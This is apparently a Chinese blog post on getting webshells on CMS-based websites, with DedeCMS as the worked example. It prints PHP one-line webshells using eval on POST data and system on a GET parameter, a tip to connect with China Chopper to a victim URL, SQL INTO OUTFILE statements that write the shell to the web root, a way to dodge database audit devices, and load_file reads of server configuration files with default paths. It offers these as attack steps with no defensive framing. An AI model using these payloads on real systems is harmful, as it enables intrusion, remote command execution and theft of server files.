获取Webshell方法

CMS系统指的是内容管理系统。已经有别人开发好了整个网站的前后端,使用者只需要部署cms,然后通过后台添加数据,修改图片等工作,就能搭建好一个的WEB系统。

CMS获取Webshell****方法

WordPress后台拿Webshell

phpcms拿Webshell

非CMS获取Webshell方法

更多的时候企业并不使用开源的CMS,而是选择自己开发源代码

参考:获取WEBshell思路 · 白帽与安全 · 看云

获取方法

1、数据库备份获取Webshell

2、抓包上传获取Webshell

3、Sql命令获取Webshell

4、模板修改获取Webshell

5、插入一句话获取Webshell

6、修改上传类型获取Webshell

示例

织梦dedecms演示

文件管理器新建木马文件

也可以用上传文件上传免杀的一句话木马

文件内容一句话木马:<?php @eval($_POST'q.');?>

菜刀连接网址http://192.168.246.11/dedecms/uploads/q.php就可以获得受害机文件

如果没有文件管理器可以在模块的地方安装一下,用完在卸载就可以

标签源码编辑

或者直接新建一个标签源码,输入木马。就可以直接访问

模版修改

修改,在代码里面插入木马。

注意这里后缀是.html

Sql命令获取Webshell

思路:利用sql语句插入语句然后输出到指定木马php

如果提示没有权限,需要配置下my.ini内容secure_file_priv='',这样就可以输出到指定文件

在执行语句就把木马放到指定文件了

因为上面的命令会创建表,如果有数据库审计设备会被发现,所以可以执行以下输入木马语句,避免对数据库操作

select '<?php @eval($_POSTpass);?>' INTO OUTFILE 'C:\\php\\WWW\\dedecms\\1.php';

echo命令也可以:

select '<?php echo \'<pre>\';system($_GET\\'cmd\\'); echo \'</pre>\'; ?>' INTO OUTFILE 'C:\\php\\WWW\\dedecms\\1.php'

读路径:

select load_file('c://windows//system32//inetsrv//MetaBase.xml ');

默认路径

Windows:
c:\windows\php.ini php配置文件
c:\windows\system32\inetsrv\MetaBase.xml IIS虚拟主机配置文件

Linux:
/etc/php.ini php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf 虚拟目录配置文件

其他获取webshell方法

1、Tomcat获取Webshell

2、Weblogic获取Webshell

3、JBoss获取Webshell

相关推荐
treesforest38 分钟前
做内容平台,IP地址精准定位和IP高精度定位查询怎么帮我们提升用户留存
网络·网络协议·tcp/ip
电商API_1800790524743 分钟前
电商ERP 自动同步订单功能实现拆解与技术手段
服务器·前端·网络·爬虫
云计算-Security1 小时前
分组交换的可靠性来自哪里?
网络·智能路由器
ward RINL1 小时前
# GPT-5.6-sol vs GPT-5.5 新题实测:非弹性碰撞物理题和稳定路由算法
网络·gpt·算法
数据知道2 小时前
DNS 安全攻防:缓存投毒、DNS 隧道与检测实战
安全·网络安全·缓存·缓存投毒
wang_shu_mo_ran2 小时前
网络编程(二):UDP数据报在客户端与服务端之间的传输
网络·网络协议·udp
humors2212 小时前
【转帖】关于防范AI编程工具Claude Code安全后门隐患的风险提示
网络·安全·ai编程
深度智能科技2 小时前
IPv6无网络访问权限怎么解决?【图文讲解】Win10/Win11 IPv6无网络访问权限完整修复实操教程
网络·ipv6·深度c盘清理·ipv6协议开启自动获取ip·ipv6无网络访问权限·上不了网怎么办·防火墙拦截ipv6
梦帮科技3 小时前
Rust+Tauri+EVM:构建下一代内存安全级数字版权(DRM)主权音频网络与跨链金融系统的技术实践与全景架构
网络·安全·架构·rust·区块链·音视频·web3.py
mudtools3 小时前
HttpUtils:一个编译时生成的声明式 HTTP 客户端框架
网络·网络协议·http·.net